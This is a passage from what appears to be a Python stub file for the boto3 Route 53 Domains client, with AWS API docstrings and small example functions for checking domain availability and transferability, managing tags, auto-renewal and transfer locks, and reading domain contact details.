Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'Availability': 'AVAILABLE'|'AVAILABLE_RESERVED'|'AVAILABLE_PREORDER'|'UNAVAILABLE'|'UNAVAILABLE_PREMIUM'|'UNAVAILABLE_RESTRICTED'|'RESERVED'|'DONT_KNOW'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
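# Illustrative sketch: checking availability for a single name. 'example.com' is a
# placeholder; credentials are assumed. DONT_KNOW and PENDING both warrant a retry later.
def _example_check_domain_availability():
    import boto3
    client = boto3.client('route53domains', region_name='us-east-1')
    response = client.check_domain_availability(DomainName='example.com')
    availability = response['Availability']
    if availability == 'AVAILABLE':
        print('Domain can be registered')
    elif availability in ('DONT_KNOW', 'PENDING'):
        print('Registry did not answer definitively; retry later')
    else:
        print('Not available:', availability)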
def check_domain_transferability(DomainName=None, AuthCode=None):
"""
Checks whether a domain name can be transferred to Amazon Route 53.
See also: AWS API Documentation
Exceptions
:example: response = client.check_domain_transferability(
DomainName='string',
AuthCode='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to transfer to Route 53. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\n
:type AuthCode: string
:param AuthCode: If the registrar for the top-level domain (TLD) requires an authorization code to transfer the domain, the code that you got from the current registrar for the domain.
:rtype: dict
Returns
Response Syntax
{
'Transferability': {
'Transferable': 'TRANSFERABLE'|'UNTRANSFERABLE'|'DONT_KNOW'
}
}
Response Structure
(dict) --
The CheckDomainTransferability response includes the following elements.
Transferability (dict) --
A complex type that contains information about whether the specified domain can be transferred to Route 53.
Transferable (string) --
Whether the domain name can be transferred to Route 53.
Note
You can transfer only domains that have a value of TRANSFERABLE for Transferable .
Valid values:
TRANSFERABLE
The domain name can be transferred to Route 53.
UNTRANSFERABLE
The domain name can\'t be transferred to Route 53.
DONT_KNOW
Reserved for future use.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'Transferability': {
'Transferable': 'TRANSFERABLE'|'UNTRANSFERABLE'|'DONT_KNOW'
}
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
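# Illustrative sketch: pre-checking transferability before starting a transfer into
# Route 53. The domain name and auth code are placeholders; credentials are assumed.
def _example_check_domain_transferability():
    import boto3
    client = boto3.client('route53domains', region_name='us-east-1')
    response = client.check_domain_transferability(
        DomainName='example.com',
        AuthCode='auth-code-from-current-registrar',
    )
    # Only domains reported as TRANSFERABLE can actually be transferred.
    print(response['Transferability']['Transferable'] == 'TRANSFERABLE')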
def delete_tags_for_domain(DomainName=None, TagsToDelete=None):
"""
This operation deletes the specified tags for a domain.
All tag operations are eventually consistent; subsequent operations might not immediately represent all issued operations.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_tags_for_domain(
DomainName='string',
TagsToDelete=[
'string',
]
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe domain for which you want to delete one or more tags.\n
:type TagsToDelete: list
:param TagsToDelete: [REQUIRED]\nA list of tag keys to delete.\n\n(string) --\n\n
:rtype: dict
Returns
Response Syntax
{}
Response Structure
(dict) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {}
:returns:
(dict) --
"""
pass
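# Illustrative sketch: deleting tags by key. The response body is empty, so success is
# simply the absence of an exception. Domain name and tag keys are placeholders.
def _example_delete_tags_for_domain():
    import boto3
    client = boto3.client('route53domains', region_name='us-east-1')
    client.delete_tags_for_domain(
        DomainName='example.com',
        TagsToDelete=['Environment', 'Owner'],
    )
    # Tag operations are eventually consistent; listing tags immediately afterwards
    # may still show the deleted keys for a short time.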
def disable_domain_auto_renew(DomainName=None):
"""
This operation disables automatic renewal of domain registration for the specified domain.
See also: AWS API Documentation
Exceptions
:example: response = client.disable_domain_auto_renew(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to disable automatic renewal for.\n
:rtype: dict
Returns
Response Syntax
{}
Response Structure
(dict) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
def disable_domain_transfer_lock(DomainName=None):
"""
This operation removes the transfer lock on the domain (specifically the clientTransferProhibited status) to allow domain transfers. We recommend you refrain from performing this action unless you intend to transfer the domain to a different registrar. Successful submission returns an operation ID that you can use to track the progress and completion of the action. If the request is not completed successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.disable_domain_transfer_lock(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to remove the transfer lock for.\n
:rtype: dict
Returns
Response Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --The DisableDomainTransferLock response includes the following element.
OperationId (string) --Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
"""
pass
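# Illustrative sketch: removing the transfer lock and polling the resulting operation
# until it finishes. The domain name is a placeholder and the 10-second poll interval is
# an arbitrary choice; credentials are assumed.
def _example_disable_domain_transfer_lock():
    import time
    import boto3
    client = boto3.client('route53domains', region_name='us-east-1')
    op_id = client.disable_domain_transfer_lock(DomainName='example.com')['OperationId']
    while True:
        status = client.get_operation_detail(OperationId=op_id)['Status']
        if status in ('SUCCESSFUL', 'ERROR', 'FAILED'):
            break
        time.sleep(10)
    print('Transfer lock removal finished with status', status)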
def enable_domain_auto_renew(DomainName=None):
"""
This operation configures Amazon Route 53 to automatically renew the specified domain before the domain registration expires. The cost of renewing your domain registration is billed to your AWS account.
The period during which you can renew a domain name varies by TLD. For a list of TLDs and their renewal policies, see Domains That You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide . Route 53 requires that you renew before the end of the renewal period so we can complete processing before the deadline.
See also: AWS API Documentation
Exceptions
:example: response = client.enable_domain_auto_renew(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to enable automatic renewal for.\n
:rtype: dict
Returns
Response Syntax
{}
Response Structure
(dict) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.TLDRulesViolation
:return: {}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.TLDRulesViolation
"""
pass
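# Illustrative sketch: turning auto-renewal on. The call returns an empty dict, so there
# is no operation ID to poll; a TLDRulesViolation error indicates the TLD does not allow
# it. 'example.com' is a placeholder and credentials are assumed.
def _example_enable_domain_auto_renew():
    import boto3
    client = boto3.client('route53domains', region_name='us-east-1')
    client.enable_domain_auto_renew(DomainName='example.com')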
def enable_domain_transfer_lock(DomainName=None):
"""
This operation sets the transfer lock on the domain (specifically the clientTransferProhibited status) to prevent domain transfers. Successful submission returns an operation ID that you can use to track the progress and completion of the action. If the request is not completed successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.enable_domain_transfer_lock(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to set the transfer lock for.\n
:rtype: dict
Returns
Response Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --The EnableDomainTransferLock response includes the following element.
OperationId (string) --Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_contact_reachability_status(domainName=None):
"""
For operations that require confirmation that the email address for the registrant contact is valid, such as registering a new domain, this operation returns information about whether the registrant contact has responded.
If you want us to resend the email, use the ResendContactReachabilityEmail operation.
See also: AWS API Documentation
Exceptions
:example: response = client.get_contact_reachability_status(
domainName='string'
)
:type domainName: string
:param domainName: The name of the domain for which you want to know whether the registrant contact has confirmed that the email address is valid.
:rtype: dict
Returns
Response Syntax
{
'domainName': 'string',
'status': 'PENDING'|'DONE'|'EXPIRED'
}
Response Structure
(dict) --
domainName (string) --The domain name for which you requested the reachability status.
status (string) --Whether the registrant contact has responded. Values include the following:
PENDING
We sent the confirmation email and haven\'t received a response yet.
DONE
We sent the email and got confirmation from the registrant contact.
EXPIRED
The time limit expired before the registrant contact responded.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'domainName': 'string',
'status': 'PENDING'|'DONE'|'EXPIRED'
}
"""
pass
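# Illustrative sketch: checking whether the registrant has confirmed their email address.
# Note the lowercase 'domainName' parameter used by this particular operation. The domain
# name is a placeholder; credentials are assumed.
def _example_get_contact_reachability_status():
    import boto3
    client = boto3.client('route53domains', region_name='us-east-1')
    response = client.get_contact_reachability_status(domainName='example.com')
    if response['status'] == 'EXPIRED':
        # The confirmation window lapsed; request a new confirmation email.
        client.resend_contact_reachability_email(domainName='example.com')
    else:
        print(response['status'])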
def get_domain_detail(DomainName=None):
"""
This operation returns detailed information about a specified domain that is associated with the current AWS account. Contact information for the domain is also returned as part of the output.
See also: AWS API Documentation
Exceptions
:example: response = client.get_domain_detail(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to get detailed information about.\n
:rtype: dict
Returns
Response Syntax
{
'DomainName': 'string',
'Nameservers': [
{
'Name': 'string',
'GlueIps': [
'string',
]
},
],
'AutoRenew': True|False,
'AdminContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'RegistrantContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'TechContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'AdminPrivacy': True|False,
'RegistrantPrivacy': True|False,
'TechPrivacy': True|False,
'RegistrarName': 'string',
'WhoIsServer': 'string',
'RegistrarUrl': 'string',
'AbuseContactEmail': 'string',
'AbuseContactPhone': 'string',
'RegistryDomainId': 'string',
'CreationDate': datetime(2015, 1, 1),
'UpdatedDate': datetime(2015, 1, 1),
'ExpirationDate': datetime(2015, 1, 1),
'Reseller': 'string',
'DnsSec': 'string',
'StatusList': [
'string',
]
}
Response Structure
(dict) --The GetDomainDetail response includes the following elements.
DomainName (string) --The name of a domain.
Nameservers (list) --The name servers of the domain.
(dict) --Nameserver includes the following elements.
Name (string) --The fully qualified host name of the name server.
Constraint: Maximum 255 characters
GlueIps (list) --Glue IP address of a name server entry. Glue IP addresses are required only when the name of the name server is a subdomain of the domain. For example, if your domain is example.com and the name server for the domain is ns.example.com, you need to specify the IP address for ns.example.com.
Constraints: The list can contain only one IPv4 and one IPv6 address.
(string) --
AutoRenew (boolean) --Specifies whether the domain registration is set to renew automatically.
AdminContact (dict) --Provides details about the domain administrative contact.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) --The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limitée)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Société à responsabilité limitée)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER
.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA
.se
BIRTH_COUNTRY
SE_ID_NUMBER
.sg
SG_ID_NUMBER
.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) --The value that corresponds with the name of an extra parameter.
RegistrantContact (dict) --Provides details about the domain registrant.
